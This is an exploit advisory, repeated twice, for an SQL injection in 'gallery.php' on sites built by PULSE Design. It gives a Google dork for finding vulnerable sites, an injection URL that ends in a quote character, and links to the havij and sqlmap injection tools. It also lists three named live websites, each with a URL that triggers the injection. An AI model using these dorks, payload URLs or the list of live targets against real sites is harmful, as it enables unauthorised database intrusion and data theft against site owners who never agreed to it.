###################################################################################################
# Author: kj-fido
# Date: 5/14/2014
# Vendor Homepage: http://pulse.bg/
# Vulnerability Type: SQL Injection Vulnerability
# Infected File: gallery.php
# Category: webapps
# Google dork:intext:"PULSE Design" /gallery.php?pageNum_Gallery_All
# Tested on : Windows , linux
###################################################################################################
# Exploit
www.site.com/gallery.php?pageNum_Gallery_All=[ ]&totalRows_Gallery_All=[ ]&l=de&cat=[ ]'
-
You have an error in your SQL syntax .....
-
# download havij or sqlmap
http://itsecteam.com/en/projects/project1_page2.htm
http://sqlmap.org/
-
# Live Sites:
http://www.saveraptors.org/gallery.php?l=En&type=image&pageNum_Gallery_All=0&totalRows_Gallery_All=4&cat=4&subcat=0&id=37%27
http://www.tenti.eu/gallery.php?pageNum_Gallery_All=4&l=en&cat=2%27
http://www.artelvil.com/en/gallery.php?pageNum_Gallery_All=0&totalRows_Gallery_All=12&cat=3&id=71%27
-
# Greetz: To all my friends & all muslims .../
#Facebook page : https://www.facebook.com/kjfido.gov
# twitter: @kjfido
###################################################################################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# Author: kj-fido
# Date: 5/14/2014
# Vendor Homepage: http://pulse.bg/
# Vulnerability Type: SQL Injection Vulnerability
# Infected File: gallery.php
# Category: webapps
# Google dork:intext:"PULSE Design" /gallery.php?pageNum_Gallery_All
# Tested on : Windows , linux
###################################################################################################
# Exploit
www.site.com/gallery.php?pageNum_Gallery_All=[ ]&totalRows_Gallery_All=[ ]&l=de&cat=[ ]'
-
You have an error in your SQL syntax .....
-
# download havij or sqlmap
http://itsecteam.com/en/projects/project1_page2.htm
http://sqlmap.org/
-
# Live Sites:
http://www.saveraptors.org/gallery.php?l=En&type=image&pageNum_Gallery_All=0&totalRows_Gallery_All=4&cat=4&subcat=0&id=37%27
http://www.tenti.eu/gallery.php?pageNum_Gallery_All=4&l=en&cat=2%27
http://www.artelvil.com/en/gallery.php?pageNum_Gallery_All=0&totalRows_Gallery_All=12&cat=3&id=71%27
-
# Greetz: To all my friends & all muslims .../
#Facebook page : https://www.facebook.com/kjfido.gov
# twitter: @kjfido
###################################################################################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information